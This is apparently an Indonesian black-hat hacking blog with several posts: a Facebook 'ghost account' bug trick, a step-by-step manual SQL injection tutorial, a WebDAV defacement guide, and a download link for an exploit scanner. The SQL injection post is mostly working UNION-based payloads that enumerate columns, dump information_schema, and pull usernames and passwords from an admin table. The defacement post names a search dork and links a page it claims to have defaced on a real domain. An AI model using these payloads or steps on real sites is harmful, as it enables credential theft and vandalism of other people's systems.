Wednesday 22 January 2014

Cara Buat Akun Hantu ( BLANK )

Assalamualaikum wr. wb.

Malam2 Gini Bete gak ada kerjaan jadi post aje deh :D
itung2 isi blog aje :D

kali Ini ane Akan Share cara Buat akun Hantu ( Blank ) Akun Hantu Itu Akun yang blank dan tidak bisa di klik nih contoh punya ane
 Sample Blank ^_^ keren kan :D

Ya udah gak usah Banyak basa basi Langsung aje praktek
nih contoh SS punya ane




1. Ente Buat Email dulu .

2. Masuk Ke Bug Akunnya BUG FACEBOOK < klik





3. Masukan Email baru dan Passwoordnya sama kek daftar biasa

4. Terus Buka M.facebook.com
5. Terus masukan email dan pw ente ke m.fb.com
6. kalau ada tulisan Klik di sini ente cuma perlu konfirm atau tekan klik disini aje nih contoh di ss


7.Akan Terlihat halaman verifikasi
8. check di email 
9. check id kotak masuk
10. jangan di clik linknya tapi ambil IDnya aje 
Contoh kek SS di bawah ini



11. terus masukin ke halaman verifikasi :D



12. selesai and ikuti langkah selanjutnya



Selesai deh Gampang kan ^_^

jangan lupa follow The Dark Of Life ya ^_^


Wednesday 15 January 2014

SQL INJECTION MANUAL

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

Dork Di google banyak :p


===========
=step Satu:=
===========

carilah target
misal:

Code:

[site]/berita.php?id=100



Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:

Code:

[site]/berita.php?id=100' atau
[site]/berita.php?id=-100



sehingga muncul pesan error.


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:

Code:

[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*



ceklah secara step by step (satupersatu)...
misal:

Code:

[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--



sehingga muncul error atau hilang pesan error...
misal:

Code:
[site]/berita.php?id=-100+order+by+9--



berarti yang kita ambil adalah sampai angka 8
menjadi :

Code:

[site]/berita.php?id=-100+order+by+8--




===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--



ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--



lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah

Code:
From+Information_schema..




============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--


seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--



=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--



pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :


contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--



============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--



contoh kata yang keluar adalah id,username,password

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--



==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login :piss: tapi saya sarankan memakai schemafuzz.py untuk hasil yg lebih maksimal.


agak Rumit Ye ^_^
namanya juga SQLI  skill Mu :p

                  THE DARK OF LIFE ^_^ < Our Band
#Human Edo Tensei 

Cara Deface Dengan WEBDAV MANUAL


Oke lah Bro Ketemu lagi ma ane :D
Moga2 ente smua gak bosen ye ^_^

#Human Edo Tensei
heheh

ane Punya trick cara deface menggunakan webdav tanpa tools alias manual aje
ckckckck :D
ini trik dari om Lukman a.k.a ./SomeOne ckckck :p
ya udah lah langsung ae di simak ^_^
Titip GAYHODUS BLACKHAT ya ^_^

Pertama
pastinya niat dan dork
Dork simple aje ye atau cari di gugle banyak :v

nih dork dari ane
inurl:/hmei7.asp;.txt <opps ini sih bisa langsung tambah aje di belakang web nya :v
Tanpa pakai tools juga -_- :v :v :v

Next
masuk ke Start - My Network Places
Lihat gambar ini kalau kurang jelas




Next klik Add a Network Place
klik next jangan lupa :p






klik next lagi :D





Nah lalu Muncul seperti gambar di bawah ini
isikan Web Targetnya :D xD ^_^ lalu klik next :D



lalu klik finish :D
and Klik folder yang muncul :D



nah drag deh hasil script deface mu ^_^
untuk Opennya :D klik dua kli aje atau klik kanan open :D




Nah ini hasilnya :D

http://finance.cedare.int/testtutorwebdavmanualxd.html


dah Segitu aje ^_^
ane ganteng xD #AW



Monday 13 January 2014

Gr3eNox Exploit Scanner



Oke Bro 
ane mau Bagi2 Tools Yang dah Banyak di Google :3 
tapi gpp lah ane share aje :3
kali aje masih ada yang belum tau ^_^

dah langsung aje di Sedot :p


DOWNLOAD

Semoga Bermanfaat ^_^

Daftar Isi